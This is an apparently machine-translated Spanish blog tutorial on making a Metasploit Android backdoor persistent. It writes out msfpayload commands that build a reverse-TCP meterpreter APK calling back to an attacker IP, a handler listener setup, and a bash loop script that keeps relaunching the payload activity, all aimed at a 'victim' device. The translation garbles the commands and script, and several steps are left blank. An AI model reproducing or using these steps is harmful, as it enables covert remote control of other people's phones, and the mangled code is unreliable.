AndroidBlog

Cómo: crear una puerta trasera persistente en Android usando Kali Linux:

O más bien Cómo hacer que la puerta trasera sea persistente:

Hola mi Frío y Despiadado Hackers
Bienvenido a mi quinto post,

En este tutorial, le mostraré cómo hacer que la puerta trasera que creamos en mi guía aquí sea persistente.

Finalmente encontré una manera de hacer esto, ya que era / soy muy pobre en scripting bash, me tomó mucho tiempo (20 horas aproximadamente) para que el script funcionara y fuera ejecutable, gracias a las sintaxis en bruto que descubrí en otros sitios.

Paso 1: Enciende Kali y piratea un sistema Android:

Utilice esta guía para piratear un sistema Android en LAN.

Estaré pirateando en WAN, usando una máquina virtual.

  • Creemos una puerta trasera escribiendo: msfpayload android / meterpreter / reverse_tcp LHOST = 182.68.42.6 R> /root/abcde.apk
  • Ahora, configuremos un oyente:
  • msfconsole
  • usar exploit / multi / handler
  • establecer carga útil android / meterpreter / reverse_tcp
  • establecer LHOST 192.168.0.4
  • explotar

Después de que el usuario / víctima se instala y abre abcde.apk, aparece Meterpreter …

Paso 2: cree una secuencia de comandos persistente:

Aquí … Copie estos comandos en un bloc de notas para crear un script y guárdelo como cualquier cosa.sh (¡La extensión de archivo .sh es importante!)

————————————————– ————————————————– —-
#! / bin / bash
si bien es cierto
¿Soy inicio? –user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity
dormir 20
hecho
————————————————– ————————————————– —-
(No copie estas líneas “—–” también, no hay saltos de línea en el 3ra y 4ta línea, son un linea sola)
(La primera línea #! / bin / bash también es importante ya que reconoce el script como un script de shell bash)
(Puede configurar la suspensión en cualquier cantidad de segundos que desee que duerma el script)

Mover / copiar esto al Inicio / Carpeta raíz de KALI.

————————————————– ————————————————– —-
Script actualizado v3 (compatible con cualquier versión de Android)
CRÍTICO: NO COPIAR / PEGAR EL GUIÓN DIRECTAMENTE O (mayo) NO FUNCIONA /!
.. Supongo que tendrás que escribirlo tú mismo .. (No me preguntes por qué ..)
Código:
————————————————– ————————————————– —-
#! / bin / bash
tiempo :
¿Soy inicio? –user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity
dormir 20
hecho
————————————————– ————————————————– —-
Hay un ‘espacio’ entre ‘while’ y ‘:’
NO Múltiples espacios en el guión.
NO hay salto de línea entre la 3ª y la 4ª línea. (Entonces un total de 5 líneas)

Paso 3: cárguelo en el sistema Android pirateado:

Debe cargar el script de shell en etc / init.d / para que sea persistente incluso después Reiniciar!
Para hacer esto, navegue al directorio usando los siguientes comandos:

Ahora deberías estar en el RAÍZ directorio, puede verificar escribiendo:

Ahora escriba:

Vuelva a verificar escribiendo:

Nuevamente cambie el directorio:

Aquí estamos…

Es hora de cargar el script de Shell:

Haga esto escribiendo:

¿Que? ¡No! Nosotros necesitamos Acceso raíz para completar este comando! ¡Maldito!

No importa:

> Hagamos que la aplicación (es decir, la actividad principal) sea persistente hasta reiniciar
> Sin embargo, no será persistente después de que el sistema Android de la víctima se reinicie.
> Para hacer esto, cargue el script en cualquier lugar de la sdcard:

  • CD /
  • cd / sdcard / Descargar
  • ls
  • subir cualquier cosa.sh

¡Hecho! ¡Subido!

Paso 4: Ejecute el script:

Ahora, todo lo que tenemos que hacer es ejecutar el script una vez, y luego el script hará todo automáticamente.
Caer en el caparazón del sistema escribiendo:

Ahora, navegue hasta la ubicación del script:

  • CD /
  • cd / sdcard / Descargar
  • ls

Ahora es el momento de EJECUCIÓN. Tipo:

El guión ha sido Activado! Todo lo que tiene que hacer es presionar ctrl + C para terminar el shell (no se preocupe, el script aún se está ejecutando)

Reinicie para eliminar el script o use Task Killer

Paso 5: Prueba …

Puede probarlo saliendo de meterpreter y configurando nuevamente un Listener.
¡Debería recibir un indicador de meterpreter automáticamente!
PRUEBA:

¡Guau! Sucedió tan rápido que 3 sesiones se abrió uno tras otro.

(Sé que la imagen de arriba muestra que estoy pirateando en LAN en lugar de WAN ya que mi IP pública es dinámica y mi enrutador tenía algunos problemas técnicos, por lo que siguió reiniciándose, así que mostré t en LAN, PERO no se preocupe, lo he probado en WAN, funciona bien)

El fin:

¡Sí! Finalmente, se ha creado con éxito una puerta trasera persistente para sistemas Android.

Cosas para recordar:

  • La persistencia de la puerta trasera solo se mantendrá hasta que se reinicie el sistema Android.
  • Si está pirateando en WAN y tiene una IP pública dinámica, la persistencia solo se mantendrá hasta que su enrutador se reinicie / cambie su IP.
  • Recuerde reiniciar el Android para eliminar el script en ejecución, si está probando en su propio sistema Android.
  • Si el sistema Android de la víctima está enraizado y su IP pública es estática, entonces:

1) ¡La persistencia permanecerá para siempre en WAN!
2) La persistencia permanecerá para siempre en LAN Obviamente

¡Adiós, hackers!

¡Sigue viniendo por más!
Estaré esperando tus gustos y comentarios,

Gracias,
TEMOR

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Mira también
Cerrar
Botón volver arriba
Cerrar